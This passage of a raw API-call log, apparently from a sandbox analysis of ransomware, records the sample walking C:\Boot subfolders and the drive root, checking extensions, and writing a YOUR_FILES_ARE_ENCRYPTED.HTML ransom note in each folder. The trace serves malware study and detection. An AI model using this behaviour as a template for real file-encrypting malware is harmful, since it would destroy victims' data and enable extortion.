hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec4e20a0, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x450498a0, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0xe8725b0e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11440, dwReserved0=0x0, dwReserved1=0x60, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0155.197] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\zh-CN\\bootmgr.exe.mui") returned 33 [0155.197] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.197] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0155.197] lstrlenW (lpString=".mui") returned 4 [0155.197] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0155.197] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec4e20a0, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x450498a0, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0xe8725b0e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11440, dwReserved0=0x0, dwReserved1=0x60, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0155.197] FindClose (in: hFindFile=0x42f3100 | out: hFindFile=0x42f3100) returned 1 [0155.197] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\zh-CN\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 47 [0155.197] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\zh-CN\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\boot\\zh-cn\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, 
dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a4 [0155.198] WriteFile (in: hFile=0x4a4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe438, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe438*=0x3c00, lpOverlapped=0x0) returned 1 [0155.200] CloseHandle (hObject=0x4a4) returned 1 [0155.200] GetProcessHeap () returned 0x270000 [0155.201] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x431df40 | out: hHeap=0x270000) returned 1 [0155.201] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec508200, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x450498a0, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x450498a0, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-HK", cAlternateFileName="")) returned 1 [0155.201] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\zh-HK") returned 17 [0155.201] GetProcessHeap () returned 0x270000 [0155.201] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x431df40 [0155.201] lstrcpyW (in: lpString1=0x431df40, lpString2="\\\\?\\C:\\Boot\\zh-HK" | out: lpString1="\\\\?\\C:\\Boot\\zh-HK") returned="\\\\?\\C:\\Boot\\zh-HK" [0155.201] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\zh-HK", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Boot\\zh-HK\\*") returned="\\\\?\\C:\\Boot\\zh-HK\\*" [0155.201] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\zh-HK\\*", lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec508200, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x450498a0, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x450498a0, 
ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3100 [0155.201] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec508200, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x450498a0, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x450498a0, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0155.201] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec508200, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x450498a0, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11250, dwReserved0=0x0, dwReserved1=0x60, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0155.201] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\zh-HK\\bootmgr.exe.mui") returned 33 [0155.202] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.202] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0155.202] lstrlenW (lpString=".mui") returned 4 [0155.202] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0155.202] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec508200, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x450498a0, ftLastAccessTime.dwHighDateTime=0x1d706a3, 
ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11250, dwReserved0=0x0, dwReserved1=0x60, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0155.202] FindClose (in: hFindFile=0x42f3100 | out: hFindFile=0x42f3100) returned 1 [0155.202] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\zh-HK\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 47 [0155.202] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\zh-HK\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\boot\\zh-hk\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a4 [0155.202] WriteFile (in: hFile=0x4a4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe438, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe438*=0x3c00, lpOverlapped=0x0) returned 1 [0155.204] CloseHandle (hObject=0x4a4) returned 1 [0155.205] GetProcessHeap () returned 0x270000 [0155.205] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x431df40 | out: hHeap=0x270000) returned 1 [0155.205] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec508200, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x450498a0, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x450498a0, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 1 [0155.205] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\zh-TW") returned 17 [0155.205] GetProcessHeap () returned 0x270000 [0155.205] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) 
returned 0x431df40 [0155.205] lstrcpyW (in: lpString1=0x431df40, lpString2="\\\\?\\C:\\Boot\\zh-TW" | out: lpString1="\\\\?\\C:\\Boot\\zh-TW") returned="\\\\?\\C:\\Boot\\zh-TW" [0155.205] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\zh-TW", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Boot\\zh-TW\\*") returned="\\\\?\\C:\\Boot\\zh-TW\\*" [0155.205] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\zh-TW\\*", lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec508200, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x450498a0, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x450498a0, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3100 [0155.206] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec508200, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x450498a0, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x450498a0, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0155.206] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec508200, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x450498a0, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0xe83216ab, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11240, dwReserved0=0x0, dwReserved1=0x60, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0155.206] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: 
pszDest="\\\\?\\C:\\Boot\\zh-TW\\bootmgr.exe.mui") returned 33 [0155.206] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.206] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0155.206] lstrlenW (lpString=".mui") returned 4 [0155.206] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0155.206] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec508200, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x450498a0, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0xe83216ab, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11240, dwReserved0=0x0, dwReserved1=0x60, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0155.206] FindClose (in: hFindFile=0x42f3100 | out: hFindFile=0x42f3100) returned 1 [0155.206] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\zh-TW\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 47 [0155.206] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\zh-TW\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\boot\\zh-tw\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a4 [0155.206] WriteFile (in: hFile=0x4a4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe438, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe438*=0x3c00, lpOverlapped=0x0) returned 1 [0155.209] CloseHandle (hObject=0x4a4) returned 1 [0155.209] GetProcessHeap () returned 0x270000 [0155.210] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x431df40 | out: hHeap=0x270000) returned 1 [0155.210] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: 
lpFindFileData=0x4ebe478*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec508200, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x450498a0, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x450498a0, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 0 [0155.210] FindClose (in: hFindFile=0x42f30c0 | out: hFindFile=0x42f30c0) returned 1 [0155.210] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 41 [0155.210] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\boot\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x580 [0155.211] WriteFile (in: hFile=0x580, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe744, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe744*=0x3c00, lpOverlapped=0x0) returned 1 [0155.213] CloseHandle (hObject=0x580) returned 1 [0155.213] GetProcessHeap () returned 0x270000 [0155.214] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0155.214] FindNextFileW (in: hFindFile=0x42f2fc0, lpFindFileData=0x4ebe784 | out: lpFindFileData=0x4ebe784*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xec508200, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x450498a0, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0xeadddff4, ftLastWriteTime.dwHighDateTime=0x1cf9266, nFileSizeHigh=0x0, nFileSizeLow=0x5f9d8, dwReserved0=0x14, dwReserved1=0x4ebe844, cFileName="bootmgr", cAlternateFileName="")) returned 1 [0155.214] wnsprintfW (in: pszDest=0x430df38, cchDest=32768, 
pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\bootmgr") returned 14 [0155.214] lstrcmpW (lpString1="bootmgr", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.214] PathFindExtensionW (pszPath="bootmgr") returned="" [0155.214] lstrlenW (lpString="") returned 0 [0155.214] PathFindExtensionW (pszPath="bootmgr") returned="" [0155.214] FindNextFileW (in: hFindFile=0x42f2fc0, lpFindFileData=0x4ebe784 | out: lpFindFileData=0x4ebe784*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xec769800, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0xec769800, ftLastAccessTime.dwHighDateTime=0x1d70562, ftLastWriteTime.dwLowDateTime=0xec769800, ftLastWriteTime.dwHighDateTime=0x1d70562, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x14, dwReserved1=0x4ebe844, cFileName="BOOTSECT.BAK", cAlternateFileName="")) returned 1 [0155.214] wnsprintfW (in: pszDest=0x430df38, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\BOOTSECT.BAK") returned 19 [0155.214] lstrcmpW (lpString1="BOOTSECT.BAK", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.214] PathFindExtensionW (pszPath="BOOTSECT.BAK") returned=".BAK" [0155.214] lstrlenW (lpString=".BAK") returned 4 [0155.214] PathFindExtensionW (pszPath="BOOTSECT.BAK") returned=".BAK" [0155.214] FindNextFileW (in: hFindFile=0x42f2fc0, lpFindFileData=0x4ebe784 | out: lpFindFileData=0x4ebe784*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5cdd6f43, ftCreationTime.dwHighDateTime=0x1ca0427, ftLastAccessTime.dwLowDateTime=0x5cdd6f43, ftLastAccessTime.dwHighDateTime=0x1ca0427, ftLastWriteTime.dwLowDateTime=0x54e43b7c, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0xa, dwReserved0=0x14, dwReserved1=0x4ebe844, cFileName="config.sys", cAlternateFileName="")) returned 1 [0155.215] wnsprintfW (in: pszDest=0x430df38, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\config.sys") returned 17 [0155.215] lstrcmpW (lpString1="config.sys", 
lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.215] PathFindExtensionW (pszPath="config.sys") returned=".sys" [0155.215] lstrlenW (lpString=".sys") returned 4 [0155.215] PathFindExtensionW (pszPath="config.sys") returned=".sys" [0155.215] FindNextFileW (in: hFindFile=0x42f2fc0, lpFindFileData=0x4ebe784 | out: lpFindFileData=0x4ebe784*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x1765f29d, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x1765f29d, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x1765f29d, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x4ebe844, cFileName="Documents and Settings", cAlternateFileName="DOCUME~1")) returned 1 [0155.215] wnsprintfW (in: pszDest=0x430df38, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Documents and Settings") returned 29 [0155.215] GetProcessHeap () returned 0x270000 [0155.215] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73e0048 [0155.215] lstrcpyW (in: lpString1=0x73e0048, lpString2="\\\\?\\C:\\Documents and Settings" | out: lpString1="\\\\?\\C:\\Documents and Settings") returned="\\\\?\\C:\\Documents and Settings" [0155.215] lstrcatW (in: lpString1="\\\\?\\C:\\Documents and Settings", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Documents and Settings\\*") returned="\\\\?\\C:\\Documents and Settings\\*" [0155.215] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Documents and Settings\\*", lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec508200, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x450498a0, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x450498a0, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="\ミ∄)) returned 
0xffffffff [0155.215] GetProcessHeap () returned 0x270000 [0155.216] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0155.216] FindNextFileW (in: hFindFile=0x42f2fc0, lpFindFileData=0x4ebe784 | out: lpFindFileData=0x4ebe784*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0xfa1efe20, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0xfa1efe20, ftLastAccessTime.dwHighDateTime=0x1d70562, ftLastWriteTime.dwLowDateTime=0x7bd32120, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x5ff9d000, dwReserved0=0xa0000003, dwReserved1=0x4ebe844, cFileName="hiberfil.sys", cAlternateFileName="")) returned 1 [0155.216] wnsprintfW (in: pszDest=0x430df38, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\hiberfil.sys") returned 19 [0155.216] lstrcmpW (lpString1="hiberfil.sys", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.216] PathFindExtensionW (pszPath="hiberfil.sys") returned=".sys" [0155.217] lstrlenW (lpString=".sys") returned 4 [0155.217] PathFindExtensionW (pszPath="hiberfil.sys") returned=".sys" [0155.217] FindNextFileW (in: hFindFile=0x42f2fc0, lpFindFileData=0x4ebe784 | out: lpFindFileData=0x4ebe784*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xfa1a3b60, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0xfa1a3b60, ftLastAccessTime.dwHighDateTime=0x1d70562, ftLastWriteTime.dwLowDateTime=0x7c21ae80, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x7ff7c000, dwReserved0=0xa0000003, dwReserved1=0x4ebe844, cFileName="pagefile.sys", cAlternateFileName="")) returned 1 [0155.217] wnsprintfW (in: pszDest=0x430df38, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\pagefile.sys") returned 19 [0155.217] lstrcmpW (lpString1="pagefile.sys", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.217] PathFindExtensionW (pszPath="pagefile.sys") returned=".sys" [0155.217] lstrlenW 
(lpString=".sys") returned 4 [0155.217] PathFindExtensionW (pszPath="pagefile.sys") returned=".sys" [0155.217] FindNextFileW (in: hFindFile=0x42f2fc0, lpFindFileData=0x4ebe784 | out: lpFindFileData=0x4ebe784*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9a933d4, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9a933d4, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0xf9a933d4, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x4ebe844, cFileName="PerfLogs", cAlternateFileName="")) returned 1 [0155.217] wnsprintfW (in: pszDest=0x430df38, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\PerfLogs") returned 15 [0155.217] GetProcessHeap () returned 0x270000 [0155.217] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73e0048 [0155.217] lstrcpyW (in: lpString1=0x73e0048, lpString2="\\\\?\\C:\\PerfLogs" | out: lpString1="\\\\?\\C:\\PerfLogs") returned="\\\\?\\C:\\PerfLogs" [0155.217] lstrcatW (in: lpString1="\\\\?\\C:\\PerfLogs", lpString2="\\*" | out: lpString1="\\\\?\\C:\\PerfLogs\\*") returned="\\\\?\\C:\\PerfLogs\\*" [0155.217] FindFirstFileW (in: lpFileName="\\\\?\\C:\\PerfLogs\\*", lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9a933d4, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9a933d4, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0xf9a933d4, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f30c0 [0155.218] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9a933d4, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9a933d4, 
ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0xf9a933d4, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0155.218] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9a933d4, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9a933d4, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x70e97b57, ftLastWriteTime.dwHighDateTime=0x1ca0427, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Admin", cAlternateFileName="")) returned 1 [0155.218] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\PerfLogs\\Admin") returned 21 [0155.218] GetProcessHeap () returned 0x270000 [0155.218] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x431df40 [0155.218] lstrcpyW (in: lpString1=0x431df40, lpString2="\\\\?\\C:\\PerfLogs\\Admin" | out: lpString1="\\\\?\\C:\\PerfLogs\\Admin") returned="\\\\?\\C:\\PerfLogs\\Admin" [0155.218] lstrcatW (in: lpString1="\\\\?\\C:\\PerfLogs\\Admin", lpString2="\\*" | out: lpString1="\\\\?\\C:\\PerfLogs\\Admin\\*") returned="\\\\?\\C:\\PerfLogs\\Admin\\*" [0155.218] FindFirstFileW (in: lpFileName="\\\\?\\C:\\PerfLogs\\Admin\\*", lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9a933d4, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9a933d4, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x70e97b57, ftLastWriteTime.dwHighDateTime=0x1ca0427, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3100 [0155.218] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: 
